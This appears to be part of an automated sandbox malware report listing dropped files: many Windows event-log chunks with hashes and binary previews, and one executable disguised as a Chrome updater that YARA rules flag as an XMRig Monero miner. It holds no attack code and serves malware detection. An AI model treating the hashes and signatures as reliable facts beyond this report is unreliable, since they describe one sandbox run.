                            Preview:ElfChnk.m...............m....................e...g.....L....................................................................................................................=...........................................................................................................................f...............?...........................m...................M...F...............................................................&...................................................................................**.. ...m.........*13........./X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.936611112922836
                            Encrypted:false
                            SSDEEP:768:vey39iM13lpQaJJxfNxllEkMXNhGo1f1xFLBfd5M+IJT9Imy/OAwuM2eWE:XxWN
                            MD5:DB13AA6AFB2E9AE39DEC0AFA8BC4B49A
                            SHA1:C3AD1AF1EECCB2E8EA9F4FABCDBBD97B57811D8E
                            SHA-256:B3F23FDDF42C1C48FDD920ECEFF0327A627DFC13AC74DD74BA95DAC9E5D70BF4
                            SHA-512:0F2F51686E8942E11B58B6B79ABA43E0ED3141F5C3452C6D7BF7328DEF5E23436F95352E133B63D27175C431BD2450409C4CF2D7E8B72C107BF2114F6A024B69
                            Malicious:false
                            Preview:ElfChnk......................................A...C..a1...................................................................... H.]................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...................................................................................................................................................**..x...........&............./X.P&......./X.P...P&.C..:.v........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.481313084677958
                            Encrypted:false
                            SSDEEP:384:hh8kbAP1gjk+Jk+yk/3Suhfmk+Adk+AkKuIk+2hk+Dk+rk+4k+ik+8k+4k+Uk+RD:hNAP1EHDzShpmjmoToEEltkV48m
                            MD5:945E1E22A6B006C5137975EFBBF2C153
                            SHA1:46CBE7B09D20DCCFAF614B3ADE31E454423BCB34
                            SHA-256:5F16BBF82EA7B0FD664F5666DCD7398A7FFDF4EB6B7C890351B0EECF5450D6D4
                            SHA-512:7EDCF3613AE4B806F5FA8229526145BE38B07318340EFD257CE8A35E88338F76BF54015D99CD3F9FE1237101288258590B3BA5776782DEAB9594E52F73C3CDF5
                            Malicious:false
                            Preview:ElfChnk......................................<...>....1X......................................................................0.................b...........................=...........................................................................................................................f...............?...........................m...................M...F.......................&.......................................~...................................U...............;...............................**..x............Ft.i...........w.&.........w..._.|.1+O.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.432978599954893
                            Encrypted:false
                            SSDEEP:384:chNEuPE7VRECExEfERBElsUGIE8EP0EAEOE8VoEfqEzEXEtEsEyuEG8EVlbE7gEk:cpjZl8CTiIjV6y+pM8Lp6
                            MD5:1AB33607CC35ADEE19153EE1D625607F
                            SHA1:85D90CFD036557810077FED23A6895127C0F43FD
                            SHA-256:DA22727CBE87576EDD5EBC44479605AD6FD23CA4AD3F0892CB88FF6C40F79679
                            SHA-512:99535B020AE8126600B53D284E497CB306CB9A64590044FAE45EF02C50F1CBA470D67402CE5751C8AE6B759F9808545857F6B01C5E03604AE24E0ECC9563531A
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.379087428743082
                            Encrypted:false
                            SSDEEP:384:vNhPpKfzNKhiK7vKfCK5bKzTK7DKJBKHiK7VK8yKyXK1tKBKKziuKlQKt9KL0K1+:1oVJMEb
                            MD5:A67DC02B589134489270032022A94E52
                            SHA1:81D246C6BD9F4F8128C3719FCBA382F698CF6810
                            SHA-256:226EBE2EC4F7AC4A2FEFC1446091E67933F3EF5626CCC6939E8680B8B11E84C2
                            SHA-512:CD0405F457CE34B390752B1B1B5515CCE70034DEDE0B78E918786F959AB06B99E1FDFCA2308CFF98D55396F53F2DD8FFD59CF434C4FB5AFF7CF028404C3AE535
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):127504
                            Entropy (8bit):4.626941110419465
                            Encrypted:false
                            SSDEEP:768:fFaAl0UltbCl5kpcQVX+k/l0A45XSmzhUCtlCWuXTJEeiIAUY+lVY8o0alFwYs0c:m/LF2+H/jVj3NS/LF2+H/jVj3NP
                            MD5:834E347D9290A8CB22F280CAA723E0E0
                            SHA1:B88A550C28C4EC26D89ED362709C11C755BC2AD9
                            SHA-256:A33FAAEA5BD52823265CCE8DD5DC38E43D99FD36EC28F9BC88E72A31CCE90F06
                            SHA-512:B418732091DE916905724B5E0CB4B7613B89AD2B36C5F823E39C7829D8A72D828E60FEBD142B2F8064FE6228750BE38B05BA94603414AE3832EF8ABFBD410642
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):5.676611266803492
                            Encrypted:false
                            SSDEEP:384:2/hla5uzuzNz0zxzuewKWMKJEa5bna5czuzNz0zxzuewKWMKVa5Ka5czuzNz0zx9:2/IxmkPQXSjgN
                            MD5:216DC45E258D6DC7F9F6DE6585302CB8
                            SHA1:07B3C1918E1B050F21050A1ADCDCD525B15DA05F
                            SHA-256:E54474B775F30974295C3DFE9726AC899A2CE361E85FBC1566B5AE562B66EA1F
                            SHA-512:DAF9138115AFEAFF385670D5380A068DE403669FD214449CEC05E319D3C8FE1C23A7E623DE6E1BF5F6A9EE8A3E3FC7B55F147BD00576078044B6A0C9B45ADEF0
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.80250908226514
                            Encrypted:false
                            SSDEEP:384:Rh0QMqHM3EbMYFMOuM0cMn71MuMMxsM98M0n4MBHMovMmXMqQMrdMlOMZzMWHMBL:RZWa
                            MD5:0A7816537227785FACF8A606472B10DB
                            SHA1:FEF158CB795A369294B015D9C1FF196731378E91
                            SHA-256:E56B6EC8B7CD6FBF40484E7DC9ADFD57523496713224C21E03114864D1440D7B
                            SHA-512:022B0704FB0A85BE568DA80A31721EF4F0C6CFF0B48411D79D0D665778E0D8BD18B10909E17651B2B47D7F379D9657E99213E5F8350FB1568B23111C2B69777E
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.6719274221831006
                            Encrypted:false
                            SSDEEP:384:Wrhf1y61h1M1v1Rr1w1Y19121s1h1u1i1r1S1j1Y1p131G1J1c1j14141i1A141r:WraTyaZc5
                            MD5:B20ECF00FA390AD8AAB4C681E4E730ED
                            SHA1:CF276E3E1BA35D71F22B982A1E108B056999AAF1
                            SHA-256:DE0DD44B75CA8E6A859BC6CE8022103B4ECD1E24A585664C08EE7E791CADC243
                            SHA-512:C62712250306D4A42A98B8DF07CA907C47F852766F618F0017B8C5B4C1553229C41CE9399F280E0F875BB5DD4C08328F834F49A68DA6D11B93101F1B1519E001
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):7032
                            Entropy (8bit):4.106877236659084
                            Encrypted:false
                            SSDEEP:192:wztk8V7n9yAmVy2ouyZ4y4Ymy2CydteVydYeykRyqFhVOy+YJVynOkyi:Y3h9yTy6y+yMyxy/6y3yoyqHVOy5VyOQ
                            MD5:56A5D3B284B827F739B14C88B8D35CCB
                            SHA1:B9BA71427078EA48B9C47B5F59C2A7AD619DBE0A
                            SHA-256:1BB9F9C16CECDDDF15AE94E4DBE9D3D11A2BF564B1772288920605995ABC71A3
                            SHA-512:3A3FC808046B2CD81823FAA38BD7E14EE26045FD686EA2FE3319B69035EF409AEB26D93FA0033F7F4DDD3A97A22F572BB94817F31F407D86951E796C8B8A1545
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):71296
                            Entropy (8bit):4.925029590303183
                            Encrypted:false
                            SSDEEP:768:rgJEtsoXXDELQXGKgJEtsoXXDERW+7zu8coO:rQMlGKQMAW+a
                            MD5:D6132B9B1169A5D0FB12F8F1B2D23D43
                            SHA1:3D62BD478983E012215D36AC274647E8BC3BA151
                            SHA-256:CE0B66B21C59CD5DAB21F3AEE3D3749102542A33E9DA38EF05D75CE02BA8865B
                            SHA-512:F7CDEB34FF2ECC5C32300D98FBEC6DAF73D1F5391A9844A46A23DDAC70B5A47B37729D5A8CB790725BBA7A2061E02B0FF93F65076E3848A96BC1DD6C5E9B7DCE
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:DIY-Thermocam raw data (Lepton 2.x), scale 4-8, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 10384593717069655257060992658440192.000000
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.7792834150270544
                            Encrypted:false
                            SSDEEP:384:Aho8N8M8p8d8I8K8t8v681o8t8K8aI848s8D828P8N8285818n8U858w8v8yt8+5:Aj31lT
                            MD5:DC510754AE7BC4632D833062AE6D1E84
                            SHA1:4DB61750804C2F06ACC1AC8AF28DBDA26363E456
                            SHA-256:FBBA46FF8106D5BB6231CF9AEC8D1100DD51814BDB9C32850122AD5F28FD3AF0
                            SHA-512:78F4A36F033A5F9D61424CAC625069C493F3C2D62B42182E19B9C9F938946DCA84E6B5E3A3801C64C9EBCCD6B9B93C884F66E1C9A9F83707105654B402E92758
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.228069212226127
                            Encrypted:false
                            SSDEEP:384:LhuvnvmvJvBvdvrvwvSvovl+v4v6vvvmvcMvOyv4vCvAvTvGvP+v5vRvH8vUv5vF:LNzTEejRRDy2
                            MD5:06D6F34A9FBE48B7637E9D75AE9AAA24
                            SHA1:517A583825FCD91BC2CFFB58814AE3CE8A9DCC9D
                            SHA-256:3F6AA2BCE671C11DE60BF4DB323643527F7B3C1AB33E39EAE86F7F52CF9E8EEC
                            SHA-512:4256B485D0C71CEB732A7EFEA668E7A613D40077E06B505F95B75511CB15BE812DC552CD44656D476D07076861FBA33EE577AC2AC3FD46014180D25AEBEC0B7F
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.0546332508278664
                            Encrypted:false
                            SSDEEP:768:8S/Bp+UdTU8UqOUyGUwaUpcuUvKUruU6DUZ5UtaUKOUpSUv2UwLiUIGUE:l7
                            MD5:496EB71ED74DC943A067BCC74776C336
                            SHA1:2E2F5DB4BCD244012D4F1CB981CB30EEC91DEC97
                            SHA-256:68F8F19B298EFA74F652B0F919DF223A41E6C6D8A160BE223DBEF6ACC7896AC3
                            SHA-512:FE84E150B56757E893CCFADF2240EAD57C080C6FB983BEA2D5EC1D95C6D1A331C265E26F54BCC1BD710837F2E03286BF154C8B8BF3C6812AE92689D618D57201
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 19, DIRTY
                            Category:modified
                            Size (bytes):69632
                            Entropy (8bit):4.134048447104968
                            Encrypted:false
                            SSDEEP:768:y3MEYS9jvhCeqi4hqQ4D/OX/VDbUlVZzaNwJcYCIl8QVQzo:GMEYwCVDbUV5ayJcYzl1VYo
                            MD5:A2795989505D486A468AA1506C6F555E
                            SHA1:2C613470037754E5E9091A837D5C3204854EDCEB
                            SHA-256:597C1000FA0387A378C705E8CA2D8640E36A8D56F0C254B68FF03134C6EA92BD
                            SHA-512:712BDAD1BDA5B7AEE5CDEA261DEE215C9E28D1CCE6C66414BCC2F00455B5FC0B0654A34E5A68D055917F6E3C59524B7FC9344C01C7C868D190C0209D1FF85CA7
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.4236203751533226
                            Encrypted:false
                            SSDEEP:96:URNVaO84oOCaapCaBYKrjjYRCaapCaiMCaapCaiBCaapCaiYTCaapCai:uV7RgpzVvOgprgpGgpJgp
                            MD5:4E74FCE0470D23DF0F687A31FFAACE5C
                            SHA1:ED264127049105A4A8B61BB6241DE12E2AB17A56
                            SHA-256:56BEE73CD26DA1EBC3466A61C47F571564FD10FC66878CB82DB7771D97E4FC01
                            SHA-512:CAD12655F1417452BE306D3F1C32CA277347B5E0D0A9AF042C23F19935AC8BFC23D9D36F56037B272BF73B2F3EF5666697AB23DA24A52EEF4D3CE168ECE29B90
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.325791615922006
                            Encrypted:false
                            SSDEEP:384:mOhw202J2q2u2gD2w2A2lCDLCICoC12SV222q2NE292Z2Y2226x2W2S2iCsCv2Eu:VI4SGWLd7URa
                            MD5:3BB4D726B4ED6A236AC6F593796BE537
                            SHA1:0BCF9228D9F25F02947B05366783C87446C57C07
                            SHA-256:88D9B2F5A28333F6289FAC27D5BEAED29B75C90281AB4106D4BBCC4E26EE253D
                            SHA-512:CC7131582172587994E4640570D8F71A897F87AA4F85F7729D91351098BDC8BEB26FC00858709F08BABE113600561EB1B696FD0886D052CD3FFAB2A3069C2EA0
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):70808
                            Entropy (8bit):4.473670379451042
                            Encrypted:false
                            SSDEEP:1536:ms5yC8ca2m14+26MJ9/CjlGHR8vbCLSEuk5kvv1hBpzYfsiC0+O6FGXnaKLaWLT3:ms5yTca2m14+26MJ9/CjlGx8vbCLSEuo
                            MD5:34EE2DCDF44485601B6B00D072ED68CE
                            SHA1:6D040681806B111286FACE402D292497912E25CC
                            SHA-256:26161159FD85BB6D069D5B1EDBF0128A16CF3CAC97573DC3C12120D5A2C6F233
                            SHA-512:DACDCDA40AEB950BEBD33203B79C85E1404A7B477C4761050D1E84B227F859ABEF88F7961CD638654EDCCA7E19549C8C75D40DC2ECD883DB6E5E5298FCAE9B79
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.353507703228985
                            Encrypted:false
                            SSDEEP:384:yhP787lKD747G74R707F27r87Y7q7t7A7d07nd7D7u72737k7Y7TN7M7Q7B7I7Va:yYciJE4Siq
                            MD5:98735D5F2D6A07618E1ABE4C320AA65E
                            SHA1:4693AA3BD51AB5B5B6F65B3A2346C93C9C024616
                            SHA-256:F9FB80665C9A081831FAC8AF3B044F234BCD73884C72DEEF3714E636E90A0A97
                            SHA-512:D92E80AA98B5EB32257E262122FD3E153D9EEE45713849635F36EA48E13AA20A3629EEAEA190C544B2119DC04FB024BACBA290F0C5C6975121759CEA861A86DE
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.2486120203665445
                            Encrypted:false
                            SSDEEP:384:FhwuTDFbuJuuDu/uVuuvu7uu6uOuU/ueuu/uFuuVuauUmuPuuAutuu2kuzjuUauT:FHawuFBow0cjyh4xXmu16S
                            MD5:C0ACE3A0F8B15DD52E3856F0D3176A49
                            SHA1:FD20DA260307E85C78656027101F23FE7FAFAA74
                            SHA-256:4FAAFE20AAFD3A05319486F4A4E992F8002CC8AA6E345238B5A009EE44A09DDD
                            SHA-512:90A39E5A1269BB794F46609B4A57C9348687686DDC37DE08E86ADBC91E5317CC54A7C5F4EED87F59A92FD9F4888938C2BF176347F735D6B9CD26636A047DDBFB
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):94904
                            Entropy (8bit):4.6800151357495565
                            Encrypted:false
                            SSDEEP:768:peWucCWw25LcbyhonqAeWucCWw25LcbyhonqTJDxZmqkbbyWunkPx72nfbyVpbyQ:H0Gw0GenMs5kSoL0GBS
                            MD5:B1EDD232211615AAEA6E74614BF42614
                            SHA1:8A1EE93A0668DD505E659A65F00F7BCF57D188DC
                            SHA-256:D511DEFD5760A64A346D1F3D7436DC2B1143F5F7B13C90B04DEA22A0BB8F8592
                            SHA-512:05EFE2263ABFDD57E1E7C7B261BBCB02A6B5B8F5CBAA4B60A045B426D18C59A35D24787CB4537D5099B3C12E45ED3CF718E0720C7EE116487D8790515745B4CC
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.8665352787002663
                            Encrypted:false
                            SSDEEP:768:dvgffnPNm/2sY3pLwIkJ2jLHbj9fr7w2imMFopTMFwr:GGaY
                            MD5:ED879A651F97ED920F7175EECE9019E7
                            SHA1:ADF4B83036B86D20A2D720D73C4A43B50638B342
                            SHA-256:22C129C7F3B6EBA8DBDFB4B78C32D1550BAB4A2075E63649D018E3770AFE45D4
                            SHA-512:67F21982F12BE55FB287524155E3322CA2CC7DA60017AB00F4C979605D3F31030AAD86B82D451AA8BC954255E37D244D534157ACE268862FF346688F84D6B6DA
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):67776
                            Entropy (8bit):2.0816242545478114
                            Encrypted:false
                            SSDEEP:384:0XhMiFpXhMiFboryorOoroortorVorVorNorrmo4oruorlIoreorNorworgorDob:Shdh8qGO4
                            MD5:54F384A4FB1E28EA5041C786EECC4DDB
                            SHA1:E904FE48796578E35584272B6B50604781202501
                            SHA-256:A0CB62316891D0529ECA02CEDBCB18004DFA05BA8EF5F51A91A46FC03C4A91DA
                            SHA-512:42D6112EE79020B2704CD80A88E33095E4D57FD8910D166F4B0A42ADD7A084D65D9749CAEED5990F0C0228C73B390E49352BC7299CE4FD8ABDFA4DC8489D7534
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.274481744467521
                            Encrypted:false
                            SSDEEP:1536:IKoKKK3KOKbKrK7KAKqKpK0KXKAK8KTK+KfKvKYKqK4KGKkKhKjK9KyKeKhK1KKR:IKoKKK3KOKbKrK7KAKqKpK0KXKAK8KTG
                            MD5:EF1FB698F3F3F7B8FFBDE6ED33C4029A
                            SHA1:8B267C46D1FA74AE8227B1643F681F4B974E6500
                            SHA-256:1B6AB2A1DFFA97778F6498F8B4749546A1A1BD9B0160C044C3DED31E1DD3CEB7
                            SHA-512:6183560AC7AA21A2AB2CF30F55363115B3C0D69050631F3A41D58E6818716BD76681E05C0B2812FA9E0A6C6C0A2A56A992F99F185AB26C4CF28A07FE7935A83E
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):2.8643456315451834
                            Encrypted:false
                            SSDEEP:768:Nka8NLadaFaRa9a1aJaJa1apahaZada1aNa1adaoakaAa8asaYakagaYa4awacaj:sN
                            MD5:8F166C41A56FAD34C661EC2E381B843C
                            SHA1:9C6FEBBB409324AA8565555DD75608F8E0E2ACE9
                            SHA-256:0489D8247E838A3FB9880E8DA9900DA19D87B6DDE47182EE846081EE41FA121E
                            SHA-512:01D531A57AEA1C80321EBAC94CE2D47A1AA4924481BE4791D47F44173E939815D5C4EE3B798D3AC18649464A4431B50953C1EE5C28929E89D595E7D0C1E23AC5
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.8187108550918736
                            Encrypted:false
                            SSDEEP:384:ZhNXDcXxzXZXeX/XOXMXauXLiXCXVX1XYXZXeX+XiXfXuXFXRX9XsX5XLXzXgXy8:ZyAg9JXHqOT
                            MD5:080903EE3E53385275B315ECC75AF406
                            SHA1:C7624D533619618D6B7EA4B0FDE3FCF5A329B6DA
                            SHA-256:E8ADC0BCABD15563F7D7ECCF285A31DB9FC89D85ECA4D35C7694B645497D506C
                            SHA-512:736CFEE45B2523DBE76337E4F15D2091E8C540512F80FE8BDC134FD4A54D6C0ADA8FE27336CC98F27541157D4EB11A75A52447C2F054662716C584159556BD74
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.8632102618611432
                            Encrypted:false
                            SSDEEP:384:w9hQ+My+s+yn+G+q/U+F+KP+tQ+1+ss+2+1+z+B+Kx+3B+b+M+T3+0+5+U+S+u+5:w9k6rO9i
                            MD5:6FAC2B6C02F9D0AFA45E58FAC3EF7E3F
                            SHA1:780663BADC1391600F8C27954F68BEBE846A0973
                            SHA-256:DD3A39B62CD58E4641CA2AB706C230B02EB25A448C6C776A86CDE14EFD767E46
                            SHA-512:0E12736725E3BBB29195DFF75E03F99210D8369EF13A63DC9E87563F52E8003108A10F6FEA87F9E99F2FA4E052E4CDD4C963C929EA2F46FD19533317C062BFF0
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):115304
                            Entropy (8bit):4.262636543295488
                            Encrypted:false
                            SSDEEP:384:QRF/R4wRRREFRFiR+h88uR+8FRRPksoR9bReSRAlRcMRI/R1GRLpRggRrTRaqR7j:tF9wjFSmtXwjFu
                            MD5:E587BEDC70348FBF8ADD76751D2FECFB
                            SHA1:DBBF5B0A8287DDC837D3C4123B082D47A8D83FFB
                            SHA-256:DF0FC05917FF071397526986D8D9CCC5F6B4FF19EA22A92D222378E414D9017E
                            SHA-512:AB4B453F1F2E29BEA81D8E80AD95922F2ACA11ADC282F326249A28BA0320C16508C13E6EDDFC124A5804985A3C8BDD8DCE9DA024E576A35428AAC76E731E90C5
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):4.2644117823770085
                            Encrypted:false
                            SSDEEP:384:DhcBwBhBwBOBwB8BwBhBwBF8BwBFBwBabBwBPBwBuBwBOBwBLBwBeBwBbBwBCBwh:DhP8bEDZJ
                            MD5:6FA4E45F3E95B20B5A728798F8ED935C
                            SHA1:48ECBA3CADA6A57ED3A8EADB01D2F1A3D05901AA
                            SHA-256:063BED26B9983316208166039D38F4553B6FC51F69284286AF29D5B946C0ABB0
                            SHA-512:67CDF6407DAEE6A8B80CE82899D64C1822D93738D6294CC7106C354C512B27A1EA1D437F1E89CECF77AABACFB6679C084AE03D647B72D41D77CD7344F407A959
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):3.4186118180164757
                            Encrypted:false
                            SSDEEP:1536:QKSTCLKnS+/y3F1Qhxf27SVSVTuziNljVNG/:K
                            MD5:387310B592EB81FA27CED9AFA0EEE988
                            SHA1:5E222396DA602AABF19B5A8AC6F1978546E5FAFB
                            SHA-256:C5E57096F10CF6062B51A19BC14A589A2523F1286B85AB52A12453FE748F3FC4
                            SHA-512:9BF5A2E2391419C173FBA70A52670DEBE867BC2BEA913A8895F36A0D47B6CB981DDED642A8A2A711B2C9E78ABF0E4C082770C39BFD265A0F014CE34F99459EC1
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):68120
                            Entropy (8bit):4.347041848155836
                            Encrypted:false
                            SSDEEP:384:eXvFRLXvFR2zoeoUoeDvnQNoKMtvoHoH+uo/8o1eof+5of+Pof+pof+Xof+Ro/Eh:mN5NKgCZ/9
                            MD5:A87DE5B7FE06DFBEAFDDBC49E1E8B7B3
                            SHA1:EFD2D9EFB144AB3906A2B000F642B82022DD03DB
                            SHA-256:362C57EF756807A67BB91D98F57F75EDCD9C701833B760E8935771425F61E2CD
                            SHA-512:B44814D9130B842BC77A2E75F033D0F8C81D1C6864488B12493D2C05A31551F11C1817D0467C7B3CE8613BDCF9F884EEDCADC8FD06B2A691824822E7971D6B7F
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):80496
                            Entropy (8bit):4.471677737461399
                            Encrypted:false
                            SSDEEP:384:XFRjJrB9G19O+z9FRjJrB9G19O+zJKbTN4QS7bQT8utPUyASJdUKq4m+Fpk87kky:VZ9aZ9xhASJJnTukQJ9LMvlZ96
                            MD5:E1AB89D6550D7B72335DD4D29114627E
                            SHA1:0134F13F2F2741428B99608FD10E4F221E4B2709
                            SHA-256:003CB67DE3F450C2C89A57CCCC525A973551482D693FF23A25B559487A782473
                            SHA-512:94B2E119C0A6F29356F84032CDFA5EAE9C60C83E6E913E0C60C0964D6C49AAA22E0C7B2D8BC8590B456970760E14156848851866F23B5EC0FB8353A5AB946BD9
                            Malicious:false
                            Process:C:\Windows\System32\svchost.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):57888
                            Entropy (8bit):3.8666411606141953
                            Encrypted:false
                            SSDEEP:1536:RZuWlbzAJijE43kE9jsvayM52KcVc7W7LHTM:J
                            MD5:A567C700450BB3D84AAB5FF2C28F89F3
                            SHA1:E29083302264FEBA5CEB4EB6DFDB40BBB0296845
                            SHA-256:6EF9419710A133B29CA35505DE1CF491E73A600B1BD61466C73C9438DC6C1CE2
                            SHA-512:7D04714B5B46F835AD5445602AE52EF008F6EF9F01E508526EBF3908ECAA3254CD98A4012C21638BF547ED20C84015D360E220561F25B1748CBD71FE84C0D15C
                            Malicious:false
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                            Process:C:\Program Files\Google\Chrome\updater.exe
                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):5536256
                            Entropy (8bit):6.689058470432344
                            Encrypted:false
                            SSDEEP:98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
                            MD5:8FA2F1BA9B9A7EA2B3C4DD627C627CEC
                            SHA1:358E3800286E5D4C5662366AD7311BC5A51BA497
                            SHA-256:78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
                            SHA-512:74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
                            Malicious:true
                            Yara Hits:
                            • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\kkldhmzqxige.tmp, Author: Joe Security
                            • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\kkldhmzqxige.tmp, Author: ditekSHen
                            • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\kkldhmzqxige.tmp, Author: Florian Roth
                            • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\kkldhmzqxige.tmp, Author: unknown
                            Antivirus:
                            • Antivirus: Joe Sandbox ML, Detection: 100%
                            • Antivirus: ReversingLabs, Detection: 75%
                            • Antivirus: Virustotal, Detection: 76%, Browse
